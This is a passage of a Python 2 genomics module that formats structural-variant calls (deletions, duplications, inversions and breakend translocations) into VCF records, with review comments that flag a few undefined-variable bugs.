    print>>fo,'##INFO=<ID=BKPTID,Number=.,Type=String,Description="ID of the assembled alternate allele in the assembly file">'
    print>>fo,'##INFO=<ID=CIEND,Number=2,Type=Integer,Description="Confidence interval around END for imprecise variants">'
    print>>fo,'##INFO=<ID=CIPOS,Number=2,Type=Integer,Description="Confidence interval around POS for imprecise variants">'
    print>>fo,'##INFO=<ID=END,Number=1,Type=Integer,Description="End position of the variant described in this record">'
    print>>fo,'##INFO=<ID=HOMLEN,Number=.,Type=Integer,Description="Length of base pair identical micro-homology at event breakpoints">'
    print>>fo,'##INFO=<ID=HOMSEQ,Number=.,Type=String,Description="Sequence of base pair identical micro-homology at event breakpoints">'
    print>>fo,'##INFO=<ID=IMPRECISE,Number=0,Type=Flag,Description="Imprecise structural variation">'
    print>>fo,'##INFO=<ID=MEINFO,Number=4,Type=String,Description="Mobile element info of the form NAME,START,END,POLARITY">'
    print>>fo,'##INFO=<ID=SVLEN,Number=.,Type=Integer,Description="Difference in length between REF and ALT alleles">'
    print>>fo,'##INFO=<ID=SVTYPE,Number=1,Type=String,Description="Type of structural variant">'
    print>>fo,'##FILTER=<ID=LowQual,Description="Score of final structural - Theoretical Score <-50">'
    print>>fo,'##ALT=<ID=DEL,Description="Deletion">'
    print>>fo,'##ALT=<ID=DEL:ME:ALU,Description="Deletion of ALU element">'
    print>>fo,'##ALT=<ID=DEL:ME:L1,Description="Deletion of L1 element">'
    print>>fo,'##ALT=<ID=DUP,Description="Duplication">'
    print>>fo,'##ALT=<ID=DUP_TANDEM,Description="Tandem Duplication">'
    print>>fo,'##ALT=<ID=INS,Description="Insertion of novel sequence">'
    print>>fo,'##ALT=<ID=INS:ME:ALU,Description="Insertion of ALU element">'
    print>>fo,'##ALT=<ID=INS:ME:L1,Description="Insertion of L1 element">'
    print>>fo,'##ALT=<ID=INV,Description="Inversion">'
    print>>fo,'##ALT=<ID=CNV,Description="Copy number variable region">'
    print>>fo,'##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">'
    print>>fo,'##FORMAT=<ID=GQ,Number=1,Type=Float,Description="Genotype quality">'
    print>>fo,'##FORMAT=<ID=CN,Number=1,Type=Integer,Description="Copy number genotype for imprecise events">'
    print>>fo,'##FORMAT=<ID=CNQ,Number=1,Type=Float,Description="Copy number genotype quality for imprecise events">'
    print>>fo,'\t'.join(['#CHROM','POS','ID','REF','ALT','QUAL','FILTER','INFO','FORMAT',output_file.split('/')[-1].replace('.vcf','')])
    fo.close()
def write_VCF_main(output_file):
    """Append the VCF body: regroup global sv_out by chromosome/position,
    merge complementary het genotypes, and write records in sorted order.

    Two records identical except for genotype with GTs {0|1, 1|0} are
    collapsed into a single 1|1 (homozygous) record.  'N' REF columns are
    patched via ref_base_returnN before printing.  Python 2 print syntax.
    """
    fo=open(output_file,'a')
    print output_file
    sv_reorganize={}
    for k1 in sv_out.keys():
        sv_reorganize[k1]={}
        for k2 in sv_out[k1].keys():
            # event IDs are '<chrom>_<start>_...'
            start=int(k2.split('_')[1])
            if not start in sv_reorganize[k1].keys():
                sv_reorganize[k1][start]={}
            SVtemp_a=[]
            SVtemp_b=[]
            for k3 in sv_out[k1][k2]:
                # group records that differ only in the trailing genotype
                if not k3[:-1] in SVtemp_a:
                    SVtemp_a.append(k3[:-1])
                    SVtemp_b.append([k3[-1]])
                else:
                    SVtemp_b[SVtemp_a.index(k3[:-1])].append(k3[-1])
            SVtemp=[]
            sv_reorganize[k1][start][k2]=[]
            for k3 in range(len(SVtemp_a)):
                # 0|1 + 1|0 on the same record means both alleles carry it
                if len(SVtemp_b[k3])==2 and SVtemp_b[k3] in [['0|1', '1|0'],['1|0', '0|1']]:
                    SVtemp_b[k3]=['1|1']
            for k3 in range(len(SVtemp_a)):
                for k4 in SVtemp_b[k3]:
                    sv_reorganize[k1][start][k2].append(SVtemp_a[k3]+[k4])
    for k1 in chromos:
        if k1 in sv_reorganize.keys():
            for k2 in sorted(sv_reorganize[k1].keys()):
                for k3 in sorted(sv_reorganize[k1][k2].keys()):
                    for k4 in sv_reorganize[k1][k2][k3]:
                        if k4[3]=='N':
                            k4[3]=ref_base_returnN(ref,k4[0],k4[1])
                        print >>fo, '\t'.join([str(i) for i in k4])
    fo.close()
def simple_flag_SA(k1,k2):
    """Classify how the alt structure k2 differs from the ref structure k1.

    Letters name reference blocks ('a','b',...); a trailing '^' marks an
    inverted block.  Returns [deleted_letters, inverted_units,
    duplicated_units_with_counts, translocation_flag].
    """
    # attach each '^' marker to the letter it inverts
    units=[]
    for ch in k2:
        if ch=='^':
            units[-1]+=ch
        else:
            units.append(ch)
    # merge collinear runs: ascending plain letters, descending inverted ones
    merged=[units[0]]
    for idx in range(len(units)-1):
        cur=units[idx]
        nxt=units[idx+1]
        if '^' not in cur and '^' not in nxt and ord(nxt)-ord(cur)==1:
            merged[-1]+=nxt
        elif '^' in cur and '^' in nxt and ord(nxt[0])-ord(cur[0])==-1:
            merged[-1]=nxt[0]+merged[-1]
        else:
            merged.append(nxt)
    outdel=[]
    outinv=[]
    outdup=[]
    outtra=0
    # record inverted units, then strip their markers in place
    for idx in range(len(merged)):
        unit=merged[idx]
        if '^' in unit:
            plain=unit.replace('^','')
            if plain not in outinv:
                outinv.append(plain)
            merged[idx]=plain
    flattened=''.join(merged)
    # any descending adjacent pair means blocks were reordered
    for idx in range(len(flattened)-1):
        if ord(flattened[idx+1])-ord(flattened[idx])<0:
            outtra=1
    if flattened!=k1:
        seen=[]
        for ch in flattened:
            if flattened.count(ch)>1 and ch not in outdup:
                outdup.append(ch)
            if ch not in seen:
                seen.append(ch)
        if ''.join(seen)!=k1:
            for ch in k1:
                if ch not in seen:
                    outdel.append(ch)
    if outdup!=[]:
        # unit_produce is defined elsewhere in this module
        dupuni=unit_produce(outdup)
        outdup2=[]
        remainder=k2
        for unit in dupuni:
            fwd=unit
            rev=''.join([ch+'^' for ch in unit[::-1]])
            if len(unit)>1:
                if merged.count(fwd)+merged.count(rev)>1:
                    outdup2.append([unit,merged.count(fwd)+merged.count(rev)])
                    remainder=remainder.replace(fwd,'')
                    remainder=remainder.replace(rev,'')
            elif len(unit)==1:
                if remainder.count(fwd)+remainder.count(rev)>1:
                    outdup2.append([unit,remainder.count(fwd)])
                    remainder=remainder.replace(fwd,'')
                    remainder=remainder.replace(rev,'')
    else:
        outdup2=[]
    return [outdel,outinv,outdup2,outtra]
def add_csv_info(csv1,flag_sex,k1,k2):
    #flag_sex=1: Maternal
    #flag_sex=2: Paternal
    """Route a simple_flag_SA classification into the del/inv/dup tables.

    csv1 = [deleted, inverted, duplicated, tra_flag]; flag_sex chooses
    which allele slot (index 0 or 1) receives the letter lists.  If the
    translocation flag is set, tra_info_add is invoked for the pair.
    """
    if flag_sex==1:
        del_let=[csv1[0],[]]
        inv_let=[csv1[1],[]]
        dup_let=[csv1[2],[]]
    else:
        del_let=[[],csv1[0]]
        inv_let=[[],csv1[1]]
        dup_let=[[],csv1[2]]
    for k3 in sv_info[k1][k2]:
        del_info_add(k3,del_let)
        inv_info_add(k3,inv_let)
        dup_info_2_add(k3,dup_let)
    if csv1[3]==1:
        tra_info_add(k1,k2)
def del_info_add(k3,del_let):
    """Record deletion calls into global del1, keyed by chromosome.

    tempa/tempb are the deleted genomic intervals on allele a / allele b;
    an interval present on both alleles is homozygous.

    Fix: the homozygous tag was written as 'hom', but hash_reorder()
    tests for 'homo' -- homozygous deletions therefore never received a
    '1|1' genotype.  Tag normalized to 'homo'.
    """
    tempa=bp_to_hash(k3[:-1],del_let[0])
    tempb=bp_to_hash(k3[:-1],del_let[1])
    for k1 in tempa:
        if k1 in tempb:
            tempc='homo'  # was 'hom' (see docstring)
            tempb.remove(k1)
        else:
            tempc='heta'
        if not k1[0] in del1.keys():
            del1[k1[0]]=[]
        del1[k1[0]].append(k1[1:]+[tempc,k3[-1],'_'.join(k3[:-1])])
    for k1 in tempb:
        # intervals only on allele b
        if not k1[0] in del1.keys():
            del1[k1[0]]=[]
        del1[k1[0]].append(k1[1:]+['hetb',k3[-1],'_'.join(k3[:-1])])
def dup_info_add(k3,dup_let):
    #dup_let=[k2i,k2j]
    """Record duplication calls into global dup1 (legacy variant used by
    comp_info_reorganize).

    NOTE(review): 'k2a' on the append line is not defined in this scope,
    so this function raises NameError when called; compare
    dup_info_2_add, which carries the copy number inside each k4.
    Confirm the intended count source before relying on this path.
    """
    for k2x in dup_let:
        for k4 in k2x:
            temp=bp_to_hash(k3[:-1],[i for i in k4])
            for k5 in temp:
                if not k5[0] in dup1.keys():
                    dup1[k5[0]]=[]
                dup1[k5[0]].append(k5[1:]+[k3[-1],'_'.join(k3[:-1]),k2a.count(k4)])
def dup_info_2_add(k3,dup_let):
    """Record duplication calls (with copy number) into global dup1.

    dup_let = [allele_a_units, allele_b_units]; each unit is
    [letters, copy_count].  Only units with copy_count > 1 are emitted,
    tagged 'heta'/'hetb' by allele.
    """
    for allele_idx,units in enumerate(dup_let):
        hetx=('heta','hetb')[allele_idx]
        for k4 in units:
            for k5 in bp_to_hash(k3[:-1],list(k4[0])):
                # the chromosome bucket is created even for copy_count<=1
                if not k5[0] in dup1:
                    dup1[k5[0]]=[]
                if k4[1]>1:
                    dup1[k5[0]].append(k5[1:]+[hetx,k3[-1],'_'.join(k3[:-1]),k4[1]])
def inv_info_add(k3,inv_let):
    #inv_let=[k2m,k2n]
    """Record inversion calls into global inv1, tagged 'heta'/'hetb' by
    which allele (index 0 / 1 of inv_let) carries the inverted unit."""
    for allele_idx,letters in enumerate(inv_let):
        hetx=('heta','hetb')[allele_idx]
        for k4 in letters:
            for k5 in bp_to_hash(k3[:-1],list(k4)):
                if not k5[0] in inv1:
                    inv1[k5[0]]=[]
                inv1[k5[0]].append(k5[1:]+[hetx,k3[-1],'_'.join(k3[:-1])])
def let_reclust(vec_in):
    """Merge adjacent collinear letters into block units.

    Input is a list of single letters, each optionally '^'-suffixed ('^'
    marks an inverted block).  Consecutive ascending plain letters merge
    ('a','b' -> 'ab'); consecutive descending inverted letters merge and
    are re-emitted ascending with one trailing '^' ('b^','a^' -> 'ab^').

    Fix: the original used range(len(k3)/2), which raises TypeError on
    Python 3 (float argument); floor division '//' keeps the Python 2
    semantics on both versions.  A redundant 'k2e=[]' was removed.
    """
    if vec_in==[]:
        return []
    else:
        k2e=[vec_in[0]]
        for k3 in range(len(vec_in)-1):
            if '^' in vec_in[k3+1]:
                if '^' in vec_in[k3] and ord(vec_in[k3][0])-ord(vec_in[k3+1][0])==1:
                    k2e[-1]+=vec_in[k3+1]
                else:
                    k2e.append(vec_in[k3+1])
            else:
                if ord(vec_in[k3+1][0])-ord(vec_in[k3][0])==1 and not '^' in vec_in[k3]:
                    k2e[-1]+=vec_in[k3+1]
                else:
                    k2e.append(vec_in[k3+1])
        k2f=[]
        for k3 in k2e:
            if '^' in k3:
                # 'c^b^a^' -> take letters at even indices, reverse, add one '^'
                k5=''
                for k4 in range(len(k3)//2):  # was len(k3)/2 (py3 TypeError)
                    k5+=k3[2*k4]
                k6=k5[::-1]+'^'
                if not k6 in k2f:
                    k2f.append(k6)
            else:
                k2f.append(k3)
        return k2f
def dup_let_recombind(vec_in):
    """Group sorted letters into consecutive runs and expand each run into
    every contiguous sub-unit of length >= 2 (singleton runs pass through).

    e.g. ['a','b','c'] -> ['ab','bc','abc']; ['a','c'] -> ['a','c'].
    Letters are assumed unique within the input.
    """
    if vec_in==[]:
        return []
    letters=sorted(vec_in)
    runs=[[letters[0]]]
    for letter in letters[1:]:
        if ord(letter)-ord(runs[-1][-1])==1:
            runs[-1].append(letter)
        else:
            runs.append([letter])
    combos=[]
    for run in runs:
        if len(run)==1:
            combos.append(run)
        else:
            # all windows of width 2..len(run), narrow widths first
            for width in range(2,len(run)+1):
                for startpos in range(len(run)-width+1):
                    combos.append(run[startpos:startpos+width])
    return [''.join(c) for c in combos]
def comp_info_reorganize(k1,k2):
    """Decompose a complex alt structure k2 ('alleleA/alleleB') relative to
    ref structure k1 into per-allele deletion, duplication and inversion
    letter sets, then record them via del/dup/inv_info_add.

    Reads module global sv_info; delegates to let_reclust and
    dup_let_recombind for unit grouping.
    """
    del_let=[[],[]]
    dup_let=[[],[]]
    inv_let=[[],[]]
    tra_let=[[],[]]
    k2a=k2.split('/')[0]
    k2b=k2.split('/')[1]
    # split each allele into letters, attaching '^' markers
    k2c=[]
    k2d=[]
    for k3 in k2a:
        if not k3=='^':
            k2c.append(k3)
        else:
            k2c[-1]+=k3
    for k3 in k2b:
        if not k3=='^':
            k2d.append(k3)
        else:
            k2d[-1]+=k3
    # per reference letter: absent -> deletion; repeated -> duplication
    for k3 in k1.split('/')[0]:
        if k2a.count(k3)==0:
            del_let[0].append(k3)
        if k2b.count(k3)==0:
            del_let[1].append(k3)
        if k2a.count(k3)>1:
            dup_let[0].append(k3)
        if k2b.count(k3)>1:
            dup_let[1].append(k3)
    k2e=let_reclust(k2c)
    k2f=let_reclust(k2d)
    k2g=dup_let_recombind(dup_let[0])
    k2h=dup_let_recombind(dup_let[1])
    k2i=[]
    #integreated dup sections
    k2j=[]
    #integreated dup sections
    # keep a candidate dup unit only if it occurs in more than one block
    for k3 in k2g:
        flag1=0
        for k4 in k2e:
            if k3 in k4:
                flag1+=1
        if flag1>1:
            k2i.append(k3)
    for k3 in dup_let[0]:
        if k2e.count(k3[0])+k2e.count(k3[0]+'^')>0:
            if not k3[0] in k2i:
                k2i.append(k3[0])
    for k3 in k2h:
        flag1=0
        for k4 in k2e:
            if k3 in k4:
                flag1+=1
        if flag1>1:
            k2j.append(k3)
    for k3 in dup_let[1]:
        if k2e.count(k3[0])+k2e.count(k3[0]+'^')>0:
            if not k3[0] in k2j:
                k2j.append(k3[0])
    # units ending in '^' are inversions
    k2m=[]
    for k3 in k2e:
        if k3[-1]=='^':
            k2m.append(k3)
    k2n=[]
    for k3 in k2f:
        if k3[-1]=='^':
            k2n.append(k3)
    for k3 in sv_info[k1][k2]:
        del_info_add(k3,del_let)
        dup_info_add(k3,[k2i,k2j])
        inv_info_add(k3,[k2m,k2n])
def bp_to_hash(bp_list,sv_let):
    """Translate letter-named blocks back into genomic intervals.

    bp_list is a flattened breakpoint list (chromosome names followed by
    coordinate strings); each consecutive coordinate pair is labelled
    'a','b',... in order.  sv_let selects labelled blocks ('^' suffixes
    are ignored); adjacent letters on the same chromosome are merged
    into one interval.  Returns [[chrom, start, end], ...] with ints.
    Reads the module-level chromosome list 'chromos'.
    """
    bp_hash={}
    block_rec=0
    block_hash=[]
    sv_let=[i[0] for i in sv_let]  # strip any '^' markers
    for token in bp_list:
        if token in chromos or not token.isdigit():
            block_hash.append([token])
        else:
            block_hash[-1].append(token)
    for blk in block_hash:
        for idx in range(len(blk)-2):
            bp_hash[chr(97+block_rec)]=[blk[0],blk[idx+1],blk[idx+2]]
            block_rec+=1
    out=[]
    if not sv_let==[]:
        out.append(bp_hash[sv_let[0]])
        for ka in range(len(sv_let)-1):
            prev=sv_let[ka]
            cur=sv_let[ka+1]
            if ord(cur)-ord(prev)==1 and bp_hash[cur][0]==bp_hash[prev][0]:
                # consecutive letters on the same chromosome: extend interval
                out[-1]+=bp_hash[cur][1:]
            else:
                out.append(bp_hash[cur])
    out2=[]
    for ka in out:
        out2.append([ka[0],int(ka[1]),int(ka[-1])])
    return out2
def tra_info_add(k1,k2):
    """Emit VCF breakend-style records for rearranged alt structures into
    global tra1, keyed by an ID built from the event record.

    k1 is the ref structure ('ab/ab'); k2 the alt ('ba/ba').  The two
    halves of the function are symmetric: allele a (k2a) fills
    tra1[SV_ID]['a'], allele b (k2b) fills tra1[SV_ID]['b'].
    Reads module globals: sv_info, tra1, chromos, ref.
    """
    for k3 in sv_info[k1][k2]:
        SV_ID='_'.join([str(i) for i in k3])
        tra1[SV_ID]={}
        k2a=k2.split('/')[0]
        k2b=k2.split('/')[1]
        # map block letters 'a','b',... to [chrom, start, end] triples
        bp_hash={}
        block_rec=0
        block_hash=[]
        for a3 in k3[:-1]:
            if a3 in chromos or not a3.isdigit():
                block_hash.append([a3])
            else:
                block_hash[-1].append(a3)
        for a3 in block_hash:
            for a4 in range(len(a3)-2):
                bp_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
                block_rec+=1
        # expand each coordinate into a (pos-1, pos) pair
        for a3 in bp_hash.keys():
            temp=[]
            for a4 in bp_hash[a3][1:]:
                temp.append(int(a4)-1)
                temp.append(int(a4))
            bp_hash[a3][1:]=temp
        #ref_allele['left']=[ref_allele[k1[0]][0]]
        #ref_allele['right']=[ref_allele[k1[-1]][1]]
        bp_hash['left']=[bp_hash[k1[0]][0],bp_hash[k1[0]][1],bp_hash[k1[0]][2]]
        bp_hash['right']=[bp_hash[k1[-1]][0],bp_hash[k1[-1]][3],bp_hash[k1[-1]][4]]
        # reference base at every stored coordinate ('N' via the stub)
        ref_allele={}
        for a3 in bp_hash.keys():
            ref_allele[a3]=[bp_hash[a3][0]]
            for a4 in bp_hash[a3][1:]:
                ref_allele[a3].append(ref_base_returnN(ref,bp_hash[a3][0],a4))
        # ---- allele a ----
        if not k2a==k1.split('/')[0] and del_flag_SA(k1.split('/')[0],k2a)==0:
            flag1=0#flag1==0:w/o inversion in the alt structure
            if '^' in k2a:
                flag1+=1
            flag2=0#flag2==0:w/o duplication in the alt structure
            for j in k2a:
                if k2a.count(j)>1:
                    flag2+=1
            flag3=0 #flag3==0: w/o translocation
            if len(k2a)>1:
                for i in range(len(k2a)-1):
                    if not ord(k2a[i+1])>ord(k2a[i]):
                        flag3+=1
            if flag1+flag2+flag3==0:
                # reference letters missing from the alt allele = deletions
                heta_Del_block=[]
                for a1 in k1.split('/')[0]:
                    if not a1 in k2a:
                        heta_Del_block.append(a1)
                tra1[SV_ID]['a']=[]
                block_hash=[]
                del_hash={}
                block_rec=0
                # NOTE(review): 'a2' is not defined anywhere in this
                # function, so this loop raises NameError when reached; by
                # analogy with the bp_hash build above it was probably
                # meant to iterate k3[:-1].  Confirm before use.
                for a3 in a2[0]:
                    if a3 in chromos:
                        block_hash.append([a3])
                    else:
                        block_hash[-1].append(a3)
                for a3 in block_hash:
                    for a4 in range(len(a3)-2):
                        del_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
                        block_rec+=1
                if not heta_Del_block==[]:
                    # merge adjacent deleted letters on the same chromosome
                    a_heta=0
                    heta_Del_new=[heta_Del_block[0]]
                    while True:
                        a_heta+=1
                        if a_heta==len(heta_Del_block):break
                        if ord(heta_Del_block[a_heta])-ord(heta_Del_block[a_heta-1])==1 and del_hash[heta_Del_block[a_heta]][0]==del_hash[heta_Del_block[a_heta-1]][0]:
                            heta_Del_new[-1]+=heta_Del_block[a_heta]
                        else:
                            heta_Del_new.append(heta_Del_block[a_heta])
                    for a3 in heta_Del_new:
                        a4=a3[0]
                        tra1[SV_ID]['a'].append(['DEL',del_hash[a4][0],int(del_hash[a4][1]),ref_allele[a4][2]])
                        a4=a3[-1]
                        tra1[SV_ID]['a'][-1].append(int(del_hash[a4][2])-1)
                else:
                    tra1[SV_ID]['a']=[]
                # group alt letters into runs that stay reference-collinear
                t1=[]
                for a3 in k2a:
                    if not a3=='^':
                        t1.append(a3)
                    else:
                        t1[-1]+=a3
                t2=[t1[0]]
                for a3 in t1[1:]:
                    if not '^' in a3 and not '^' in t2[-1] and ord(a3)-ord(t2[-1][-1])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-1]][0]:
                        t2[-1]+=a3
                    elif '^' in a3 and '^' in t2[-1] and ord(t2[-1][-2])-ord(a3[0])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-2]][0]:
                        t2[-1]+=a3
                    else:
                        t2.append(a3)
                # breakend joining the left flank to the first run
                a3='left'
                a4=t2[0]
                l_chr=bp_hash[a3][0]
                r_chr=bp_hash[a4[0]][0]
                if not '^' in a4:
                    if not a4[0]==k1[0]:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3][1])+']'+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+'['+r_chr+':'+str(bp_hash[a4[0]][2])+'['])
                elif '^' in a4:
                    tra1[SV_ID]['a'].append([r_chr, bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3][1])+']'])
                    tra1[SV_ID]['a'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
                # breakends between consecutive runs; bracket orientation
                # follows whether each side is inverted ('^')
                for t3 in range(len(t2)-1):
                    a3=t2[t3]
                    a4=t2[t3+1]
                    l_chr=bp_hash[a3[0]][0]
                    r_chr=bp_hash[a4[0]][0]
                    if not '^' in a3 and not '^' in a4:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['])
                    elif '^' in a3 and not '^' in a4:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['+ref_allele[a3[-2]][2]])
                    elif not '^' in a3 and '^' in a4:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
                    elif '^' in a3 and '^' in a4:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2], ']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'+ref_allele[a3[-2]][2]])
                # breakend joining the last run to the right flank
                if len(t2)>1:
                    a3=t2[t3+1]
                else:
                    a3=t2[0]
                a4='right'
                l_chr=bp_hash[a3[0]][0]
                r_chr=bp_hash[a4][0]
                if not '^' in a3:
                    if not a3[-1]==k1[-1]:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4][2]])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['])
                if '^' in a3:
                    tra1[SV_ID]['a'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4][2]])
                    tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['+ref_allele[a3[-2]][2]])
                #print [k1,k2]
        # ---- allele b: symmetric to allele a above ----
        if not k2b==k1.split('/')[1] and del_flag_SA(k1.split('/')[1],k2b)==0:
            flag1=0#flag1==0:w/o inversion in the alt structure
            if '^' in k2b:
                flag1+=1
            flag2=0#flag2==0:w/o duplication in the alt structure
            for j in k2b:
                if k2b.count(j)>1:
                    flag2+=1
            flag3=0 #flag3==0: w/o translocation
            if len(k2b)>1:
                for i in range(len(k2b)-1):
                    if not ord(k2b[i+1])>ord(k2b[i]):
                        flag3+=1
            if flag1+flag2+flag3==0:
                heta_Del_block=[]
                for a1 in k1.split('/')[1]:
                    if not a1 in k2b:
                        heta_Del_block.append(a1)
                tra1[SV_ID]['b']=[]
                block_hash=[]
                del_hash={}
                block_rec=0
                # NOTE(review): same undefined 'a2' as in the allele-a half
                for a3 in a2[0]:
                    if a3 in chromos:
                        block_hash.append([a3])
                    else:
                        block_hash[-1].append(a3)
                for a3 in block_hash:
                    for a4 in range(len(a3)-2):
                        del_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
                        block_rec+=1
                if not heta_Del_block==[]:
                    a_heta=0
                    heta_Del_new=[heta_Del_block[0]]
                    while True:
                        a_heta+=1
                        if a_heta==len(heta_Del_block):break
                        if ord(heta_Del_block[a_heta])-ord(heta_Del_block[a_heta-1])==1 and del_hash[heta_Del_block[a_heta]][0]==del_hash[heta_Del_block[a_heta-1]][0]:
                            heta_Del_new[-1]+=heta_Del_block[a_heta]
                        else:
                            heta_Del_new.append(heta_Del_block[a_heta])
                    for a3 in heta_Del_new:
                        a4=a3[0]
                        tra1[SV_ID]['b'].append(['DEL',del_hash[a4][0],int(del_hash[a4][1]),ref_allele[a4][2]])
                        a4=a3[-1]
                        tra1[SV_ID]['b'][-1].append(int(del_hash[a4][2])-1)
                else:
                    tra1[SV_ID]['b']=[]
                t1=[]
                for a3 in k2b:
                    if not a3=='^':
                        t1.append(a3)
                    else:
                        t1[-1]+=a3
                t2=[t1[0]]
                for a3 in t1[1:]:
                    if not '^' in a3 and not '^' in t2[-1] and ord(a3)-ord(t2[-1][-1])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-1]][0]:
                        t2[-1]+=a3
                    elif '^' in a3 and '^' in t2[-1] and ord(t2[-1][-2])-ord(a3[0])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-2]][0]:
                        t2[-1]+=a3
                    else:
                        t2.append(a3)
                a3='left'
                a4=t2[0]
                l_chr=bp_hash[a3][0]
                r_chr=bp_hash[a4[0]][0]
                if not '^' in a4:
                    if not a4[0]==k1[0]:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3][1])+']'+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+'['+r_chr+':'+str(bp_hash[a4[0]][2])+'['])
                elif '^' in a4:
                    tra1[SV_ID]['b'].append([r_chr, bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3][1])+']'])
                    tra1[SV_ID]['b'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
                for t3 in range(len(t2)-1):
                    a3=t2[t3]
                    a4=t2[t3+1]
                    l_chr=bp_hash[a3[0]][0]
                    r_chr=bp_hash[a4[0]][0]
                    if not '^' in a3 and not '^' in a4:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['])
                    elif '^' in a3 and not '^' in a4:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['+ref_allele[a3[-2]][2]])
                    elif not '^' in a3 and '^' in a4:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
                    elif '^' in a3 and '^' in a4:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2], ']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'+ref_allele[a3[-2]][2]])
                if len(t2)>1:
                    a3=t2[t3+1]
                else:
                    a3=t2[0]
                a4='right'
                l_chr=bp_hash[a3[0]][0]
                r_chr=bp_hash[a4][0]
                if not '^' in a3:
                    if not a3[-1]==k1[-1]:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4][2]])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['])
                if '^' in a3:
